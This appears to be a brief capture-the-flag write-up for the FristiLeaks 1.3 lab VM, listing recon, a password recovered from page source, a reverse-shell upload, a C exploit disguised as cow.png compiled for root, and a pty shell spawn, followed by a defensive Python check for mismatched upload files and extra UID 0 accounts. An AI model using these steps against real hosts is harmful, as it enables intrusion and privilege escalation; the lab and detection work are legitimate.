FristiLeaks 1.3 writeup - PacketMonkey22/boot2roots GitHub Wiki
nmap -A -T4 -p- $ip
Apache running
dirb -- bunch of drink names
tried a bunch of names including vm name - /fristi page
source code has comment with name and a base64 image
base64 was password
signed in
uploaded cow.png, which is just the above script, to uploads.
uploaded reverse shell
made nc
ran this: gcc /var/www/html/fristi/uploads/cow.png -o sploit -pthread -lcrypt
ran this: /var/www/html/fristi/uploads/sploit -- made password test
waited five minutes
created new nc
cd /home
firefart exists and is root
python -c 'import pty;pty.spawn("/bin/bash")'
su firefart
test
am root.
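
A defender's check for two artifacts these notes leave on the box, as an added example that is not part of the original writeup: a file in the uploads directory whose .png name does not match its content, and a UID 0 account other than root. The function names and all sample data are constructed for illustration.

```python
import os
import tempfile

# Leading bytes of the image types an image upload form would normally accept.
IMAGE_MAGIC = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}

def mismatched_images(upload_dir):
    """Return names of files whose image extension does not match their content."""
    flagged = []
    for name in sorted(os.listdir(upload_dir)):
        ext = os.path.splitext(name)[1].lower()
        if ext not in IMAGE_MAGIC:
            continue
        with open(os.path.join(upload_dir, name), "rb") as fh:
            head = fh.read(8)
        if not any(head.startswith(m) for m in IMAGE_MAGIC[ext]):
            flagged.append(name)
    return flagged

def extra_uid0_accounts(passwd_text):
    """Return account names that have UID 0 and are not 'root'."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names

def demo():
    # Constructed sample data, not copied from the VM.
    passwd = (
        "root:x:0:0:root:/root:/bin/bash\n"
        "firefart:HASH_PLACEHOLDER:0:0:constructed:/root:/bin/bash\n"
        "apache:x:48:48:Apache:/var/www:/sbin/nologin\n"
    )
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "logo.png"), "wb") as fh:
            fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)  # real PNG signature
        with open(os.path.join(d, "cow.png"), "wb") as fh:
            fh.write(b"#include <stdio.h>\nint main(void){return 0;}\n")  # C source
        return mismatched_images(d), extra_uid0_accounts(passwd)

if __name__ == "__main__":
    print(demo())
```

On a real host, point `mismatched_images` at the web upload directory and feed `extra_uid0_accounts` the contents of /etc/passwd.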